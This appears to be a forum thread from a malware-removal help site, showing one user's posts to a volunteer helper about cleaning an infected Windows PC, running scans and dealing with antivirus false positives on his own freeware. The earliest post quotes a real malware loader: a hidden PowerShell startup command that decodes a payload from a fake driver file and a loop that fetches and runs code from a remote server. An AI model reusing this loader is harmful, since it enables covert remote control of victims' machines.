Teapot

Well Maurice, you have helped me very much, thanks a lot for your time and your patience. I was considering reinstalling windows which would have cost me a lot of time, so i'm very grateful. I wish you all the best too and good luck helping others. Jean

Here you are again. Regarding the false positive, quite a few years back i have been asking on security software forums about this and i never got responses, except that i learned it's a common problem and i was not alone. Frankly, one has to come to the conclusion that big companies don't care much for small developers. In my case there is a freeware program called planetdance which is rather popular around the world but i keep getting complaints from people that their anti-virus is refusing and telling them all kinds of scary things, so they don't trust my software, i even got people right-out asking me if i can be trusted :) I stopped complaining about it and accepted it as a fact of life, but if you see chance to do something please do. Jean AdwCleaner[C00].txt

It won't let me change the Windows Security Option because it's a trial, it says premium only. I'm not sure whether that means i can't turn it off, it seems to be on. In the scan lots of programs i made are flagged as malware. In fact, lots of security programs flag software as malware for the only reason that they are unknown to them. This is false information. Anyway, things like astroclock.exe, rename.exe, movie.exe etc etc are my own. Some are freeware from jcremers.com. I do have malware bytes firewall which i love. mb.txt

Hi Maurice, I have a lot of software on the pc which i hardly use, i just keep it because i have the space. For instance i have more then one version of libre office, a whole drive with all kinds of software. Since work on android has stopped i don't use java anymore. I know it's a bit of a mess, i'm cleaning things up as i have time. I'm sorry, I thought we were ready and i deleted the c:\FRST map. I only have the .txt file but that's not what you're asking. I have not seen any suspicious activity anymore. Can i make you a small donation? I regret not being able to send the quarantine data you request, i wasn't patient enough, i do see the importance of your work.

Here you are. SecurityCheck.txt

I can't get it to download, Chrome and Edge say 'virus detected' and Vivaldi just doesn't download it. Tried a few times.

Here you are.. Addition.txt FRST.txt

Here's the scan result. I think FRST already removed the trojan? Thanks!! result.txt

i'm doing a full scan and it's gonna take some more hours. It will probably ready tomorrow.

scan in progress..

The G: drive is where most of my software project are.

Hi Maurice, yes i did those, thanks.

Internet problem solved, DHCP was not enabled anymore.

The scan completed in 15 minutes, i attached the log. However i'm having problems with intenet now. I had to get to my laptop to post back. Some sites do work, but others are unreachable. Fixlog.txt

will do, thanks, see you later.

my topic was hijacked so i complained and the webmaster has made a new topic for me. Thanks! I will await your instructions. I don't think there's anything active anymore, i don't see strange processes, but i would like an opinion from the expert.

Hello, I had a powershell script running at startup. I've done some research, deleted some files, and i don't see the process anymore but i still don't know what it was. This was the commandline for the script "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\SkVSjq0D9\DA4A1F43-F9E8-4A62-988D-3DDAC0ECE249.sys'), 1560279, 410); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))} With a little help i could decipher what the script tried to do: while ($true) {try {$r = Invoke-RestMethod -Uri 'http://wmail-service.com/v1/CECCE2DA-EF51-4D10-B16A-726EEBC7E043?v=Downloads_Counter12'if($r -ne ''){Start-Job ([ScriptBlock]::Create($r)) | Wait-Job}}catch {}Start-Sleep 2} I deleted that folder in System32\drivers and i have not seen powershell running anymore but i'm not reassured. Still don't know what started that script. Thanks a bunch for help. ps i'm a developer so there are some unknown exe's on my system, sorry. FRST.txt Addition.txt